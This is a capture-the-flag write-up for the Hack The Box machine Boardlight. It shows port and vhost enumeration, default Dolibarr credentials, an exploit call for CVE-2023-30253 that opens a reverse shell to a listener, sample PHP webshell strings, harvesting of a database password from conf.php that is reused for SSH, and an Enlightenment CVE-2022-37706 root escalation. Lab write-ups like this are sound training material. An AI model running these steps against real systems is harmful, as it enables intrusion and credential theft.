Boardlight

OS: Linux
Difficulty: Easy
Points: 20

Nmap Scan

A full-port sweep first, then a version and default-script scan on the two open ports:

nmap -v -Pn -p- --min-rate=5000 10.129.102.123
nmap -vvv -p 22,80 -sV -sC -oN nmap.txt 10.129.102.123
Nmap scan report for 10.129.102.123
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

We fuzz for virtual hosts (with board.htb resolving to the target), filtering out the default page by its word count:

ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.board.htb" -u http://board.htb/ -fw 6243
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 164ms]

The crm subdomain hosts Dolibarr 17.0.0, and the login accepts the default credentials:

admin : admin

Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253)

This version of Dolibarr is affected by CVE-2023-30253, an authenticated PHP code injection in the website module: the check that strips PHP from page content only matches the lowercase <?php open tag, so a page containing <?PHP ... ?> is saved and executed by the server (fixed in 17.0.1). With the exploit script linked in the references we get a reverse shell as the web server user.

Start a listener on the attacker host first (for example nc -lvnp 1234); the last two arguments are the listener's IP and port:

python3 exploit.py http://crm.board.htb admin admin 10.10.14.23 1234
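The bug class behind this CVE, as an added illustration that is not Dolibarr's own source code or the exploit from the references: a content filter that only recognises the lowercase "<?php" open tag next to a hardened check that matches the tag case-insensitively and also catches the "<?=" short echo tag. The payload strings are constructed for the demonstration.

```python
import re

# Added illustration of the bug class behind CVE-2023-30253, not Dolibarr's
# own source: a filter that only knows the lowercase "<?php" open tag, beside
# a hardened check that matches the tag case-insensitively and also catches
# the "<?=" short echo tag.

VULNERABLE_NEEDLE = "<?php"


def blocks_php_vulnerable(content: str) -> bool:
    """Case-sensitive substring check: "<?PHP" is not recognised as PHP."""
    return VULNERABLE_NEEDLE in content


def blocks_php_hardened(content: str) -> bool:
    """Case-insensitive match on "<?php" (word boundary) or the "<?=" short tag."""
    return re.search(r"<\?(?:php\b|=)", content, re.IGNORECASE) is not None


# Constructed payloads used to exercise the two checks (hypothetical content).
PAYLOADS = {
    "lower": "<?php system($_GET['c']); ?>",
    "upper": "<?PHP system($_GET['c']); ?>",
    "mixed": "<?Php system($_GET['c']); ?>",
    "short": "<?= shell_exec($_GET['c']); ?>",
    "benign": "<p>Welcome to the CRM</p>",
}


def bypasses(check) -> list:
    """Names of the PHP-bearing payloads that the given check fails to block."""
    return [name for name, body in PAYLOADS.items()
            if name != "benign" and not check(body)]


if __name__ == "__main__":
    print("vulnerable filter misses:", bypasses(blocks_php_vulnerable))
    print("hardened filter misses:  ", bypasses(blocks_php_hardened))
```

Note that if short_open_tag is enabled in php.ini a bare "<?" also opens PHP, so a filter on user-supplied content that ends up in a .php file should reject any "<?" sequence rather than enumerate tag spellings.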

Lateral Movement

In Dolibarr's configuration file we find the database credentials:

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
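A small parser for the single-quoted assignments in a conf.php, as an added example that is not part of the original writeup. SAMPLE_CONF is a constructed excerpt: the lines shown above plus a commented-out line and a hypothetical key with an escaped quote, to show that PHP single-quoted strings keep "$" literal and only treat \' and \\ as escapes, so the password is recovered exactly as written.

```python
import re

# Added example, not from the original writeup: parse the single-quoted
# assignments of a Dolibarr conf.php. SAMPLE_CONF is a constructed excerpt
# (the lines from the writeup plus a commented-out line and a hypothetical
# key with an escaped quote, to exercise the parser).
SAMPLE_CONF = r"""<?php
// $dolibarr_main_db_pass='old-password-in-a-comment';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$example_escaped='it\'s constructed';
"""

# $name='value'; where value is a PHP single-quoted string: only \' and \\
# are escapes and '$' is literal (no interpolation). Anchored at line start
# so commented-out assignments are skipped.
ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", re.MULTILINE)


def php_unquote(raw: str) -> str:
    """Undo the two escapes PHP allows inside single quotes, left to right."""
    return re.sub(r"\\(['\\])", r"\1", raw)


def parse_php_conf(text: str) -> dict:
    """Map variable name -> value for every single-quoted assignment."""
    return {name: php_unquote(raw) for name, raw in ASSIGN_RE.findall(text)}


def db_credentials(conf: dict):
    """The (user, password) pair Dolibarr uses for its database."""
    return conf.get("dolibarr_main_db_user"), conf.get("dolibarr_main_db_pass")


if __name__ == "__main__":
    conf = parse_php_conf(SAMPLE_CONF)
    user, password = db_credentials(conf)
    print(f"db user: {user}")
    print(f"db pass: {password}")
```

Run it against the real conf.php once you have a shell on the box; the password it returns is the one to try against the local accounts (su or ssh), which is the reuse the next step relies on.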

The database password is reused by the local user larissa:

larissa : serverfun2$2023!!

┌──(root㉿kali)-[~/htb/BoardLight]
└─# ssh larissa@10.129.102.123
larissa@10.129.102.123's password: 

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

larissa@boardlight:~$ cat user.txt 
19a69a78b3e745a1b475eeddfcec9409
larissa@boardlight:~$

Privilege Escalation

linpeas flags several setuid-root binaries belonging to the Enlightenment window manager; the cpufreq module directory also reveals the installed version, 0.23.1:

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device                       
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)                                                                  
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)                                                             
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)                                                            
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

Enlightenment Local Privilege Escalation (CVE-2022-37706)

enlightenment_sys, one of those setuid-root helpers, is affected by CVE-2022-37706: in Enlightenment before 0.25.4 it mishandles mount pathnames that begin with /dev/.., which lets a local user run commands as root. Version 0.23.1 is inside the affected range. We copy the exploit script linked in the references to the machine and run it.
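A triage check for the conditions above, as an added example that is not part of the writeup or of the exploit repository: it parses an ls -l style SUID listing, keeps the setuid-root entries, looks for the enlightenment_sys helper and reads the version out of a module directory name to compare it with the fixed release. SAMPLE_LISTING is constructed from the linpeas lines shown above; the fixed version 0.25.4 comes from the CVE description, and the module-path version is only a heuristic for the installed release.

```python
import re
from typing import List, Optional, Tuple

# Added example, not from the original writeup: triage an SUID listing for the
# CVE-2022-37706 preconditions. SAMPLE_LISTING is constructed from the linpeas
# output shown in the writeup; FIXED_VERSION is the release named in the CVE
# description. The version taken from a module directory name is a heuristic
# for the installed Enlightenment release, not an authoritative check.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
"""

FIXED_VERSION = (0, 25, 4)

# mode, link count, owner, then five tokens (group, size, three date fields),
# then the path; linpeas may append a tag after the path, which is ignored.
LS_RE = re.compile(r"^(\S{10})\s+\d+\s+(\S+)(?:\s+\S+){5}\s+(\S+)")
VERSION_RE = re.compile(r"/enlightenment/modules/[^/]+/linux-gnu-[^/]+-(\d+(?:\.\d+)+)/")


def setuid_root_paths(listing: str) -> List[str]:
    """Paths whose mode string carries the setuid bit and whose owner is root."""
    found = []
    for line in listing.splitlines():
        m = LS_RE.match(line)
        if not m:
            continue
        mode, owner, path = m.groups()
        if mode[3] in "sS" and owner == "root":
            found.append(path)
    return found


def enlightenment_version(paths: List[str]) -> Optional[Tuple[int, ...]]:
    """Version embedded in an Enlightenment module directory name, if any."""
    for path in paths:
        m = VERSION_RE.search(path)
        if m:
            return tuple(int(part) for part in m.group(1).split("."))
    return None


def cve_2022_37706_candidate(listing: str) -> Tuple[bool, Optional[Tuple[int, ...]]]:
    """(candidate, version): candidate is True when a setuid-root enlightenment_sys
    is present and the version is unknown or older than the fixed release."""
    paths = setuid_root_paths(listing)
    has_helper = any(p.endswith("/enlightenment/utils/enlightenment_sys") for p in paths)
    version = enlightenment_version(paths)
    in_range = version is None or version < FIXED_VERSION
    return has_helper and in_range, version


if __name__ == "__main__":
    candidate, version = cve_2022_37706_candidate(SAMPLE_LISTING)
    print(f"enlightenment version: {version}, CVE-2022-37706 candidate: {candidate}")
```

Feed it the output of find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null from the target, and confirm the version with the package manager (dpkg -l enlightenment) before relying on the heuristic.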

References

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit